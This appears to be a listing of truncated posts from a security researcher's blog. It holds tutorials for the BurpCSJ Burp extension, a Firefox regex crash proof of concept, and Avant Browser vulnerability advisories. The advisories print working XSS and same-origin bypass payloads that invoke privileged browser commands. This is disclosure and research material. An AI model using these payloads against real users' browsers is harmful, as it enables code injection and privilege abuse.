malerisch.net

I have received many questions on how to properly handle authentication when using BurpCSJ , so here is a short tutorial on how to properly manage authentication. If you are looking for how to use this Burp extension, here is a basic tutorial  as well. In this post, we are going to use BurpCSJ against the Altoro bank (vulnerable web application made on purpose), which is available online here: http://demo.testfire.net/ First, start clean (the reasons will be clear at the end of this tutorial): - Start Burp; - Start browser and configure proxy settings to work with Burp; - Browse to target site: http://demo.testfire.net/ - Perform login: user: jsmith - password: Demo1234 - Check Burp cookie jar (under options/sessions), this should be populated with some cookies: - Configure BurpCSJ (Crawljax tab) and make sure that "Use Manual Proxy" is ticked and it is pointing to Burp and that the "Use cookie jar" option is ticked as well: - Start/Launch Bur...

Recently, I have found an interesting crash in Firefox and decided to investigate more. So I decided to Google for it and it appears that the issue is already known and was reported few months ago to Mozilla. However, the bug is not fixed yet (at least in FF 26) and as a matter of personal exercise, I have decided to dig a little deeper and collect some notes which I am sharing in this blog post. Here is a brief analysis of what I have found, thanks also to the pointers given from my friend Andrzej Dereszowski . This is the crash PoC: <html> <head> <script> function main() { regexp = /(?!Z)r{2147483647,}M\d/; "A".match(regexp); } main(); </script> </head> <body> </body> </html> Below, a windbg screen shot showing the crash on Firefox 25 / Windows 8.1 (64bit):   At this stage, we can infer that an overflow occurred and as a measure of protection FF decided to crash instead of gracefully handle the is...

As part of my research and talk titled " Augmented Reality in your web proxy " presented during the HackPra AllStars program / OWASP AppSec EU 2013   security conference in Hamburg, I decided to release a new Burp Pro extension which integrates  Crawljax , Selenium and JUnit . I decided to take this approach to increase application spidering coverage (especially for Ajax web apps), speed up complex test-cases and take advantage of the Burp Extender API . Downloads BurpCSJ extension JAR - download (all dependencies included) BurpCSJ source code - github "Augmented Reality in your web proxy" - presentation (slideshare) Getting started Download BurpCSJ ; Load BurpCSJ extension jar via the Extender tab; Choose the URL item from any Burp tab (e.g. target, proxy history, repeater);  Right click on the URL item; Choose menu item "Send URL to Crawljax"; Crawljax will automatically start crawling the URL that you choose. Tutorials ...

This is a simple tutorial to get you started with BurpCSJ and Crawljax. Installation is easy - just download the BurpCSJ and import it in Burp via the extender tab, as shown below: Extender -> Add -> Choose File Once the extension is loaded, two new tabs will appear on the right side: Start crawling To start crawling, grab an URL item from any Burp tab (e.g. proxy history), right-click on the item and choose "Send to URL to Crawljax", as shown below: After this, Crawljax session will start based on settings configured via the Crawljax tab. It is always recommended to choose a web root URL item for Crawljax e.g. http://yoursite.xxx/ instead of a specific page or folder. This is typically the URL that you have configured under Target/Scope in Burp. Crawling with a different browser Under the Crawljax tab, it possible to configure the path to the browser drivers, proxy settings and other options for Crawljax. If you need to use a d...

Details Vendor Site: Avant browser ( www.avantbrowser.com ) Date: December, 5 2012 – CVE (TBA) Affected Software: Avant Browser Ultimate 2012 Build 28 and potentially previous versions Status: Unpatched Researcher: Roberto Suggi Liverani -  @malerisch PDF version:  Avant_multiple_vulnerabilities_advisory.pdf Stored Cross Site Scripting - Feed Reader (browser://localhost/lst?*) A malicious user can inject and store arbitrary JavaScript/HTML code via multiple RSS feed elements. Vulnerable elements are the following: <title>  element: JavaScript injection using HTML encoded payload <link>  element: JavaScript injection using javascript: pseudouri ( this is rendered in about:blank zone.) <description>  element: JavaScript injection using HTML encoded payload The following table shows an example of malicious RSS feed: <?xml version='1.0' encoding="ISO-8859-1"?> <rss version='2.0'> <channel> <...

Details Vendor Site: Avant browser ( www.avantbrowser.com ) Date: December, 5 2012 – CVE (TBA) Affected Software: Avant Browser Ultimate 2012 Build 27 and potentially previous versions Status: Unpatched Researcher: Roberto Suggi Liverani -  @malerisch PDF version:  Avant_multiple_vulnerabilities_advisory.pdf Cross Context Scripting – browser:home – Most Visited And History Tabs A malicious user can inject arbitrary JavaScript/HTML code through the websites visited with the Avant Browser. The code injection is rendered into the both the Most Visited and History tabs within the browser:home page,  which displays URL and the title of the page. A malicious user can inject and store JavaScript/HTML content by using the <title> HTML element, as shown in the table below: <title>aaa"><img src=a onerror='var vstr = {value: ""};window.navigator.AFRunCommand(60003, vstr);alert(vstr.value);'></title> Injected payload is render...

Details Vendor Site: Avant browser ( www.avantbrowser.com ) Date: December, 5 2012 – CVE (TBA) Affected Software: Avant Browser Ultimate 2012 Build 28 and potentially previous versions Status: Unpatched Researcher: Roberto Suggi Liverani -  @malerisch PDF version: Avant_multiple_vulnerabilities_advisory.pdf Same of Origin Policy Bypass A malicious user can execute arbitrary JavaScript/HTML code on the privileged browser:home page from an untrusted web page on Internet (http:// zone). This is possible by creating an iframe element pointing to the browser:home page and then invoking privileged commands using a window object reference to the iframe element, as shown in the example below: <iframe name="test2" src=" browser:home "></iframe> <script> window['test2'].navigator.AFRunCommand(id_of_privileged_command, vstr) </script> This code allows interaction from an untrusted zone (http://) to a trusted and priv...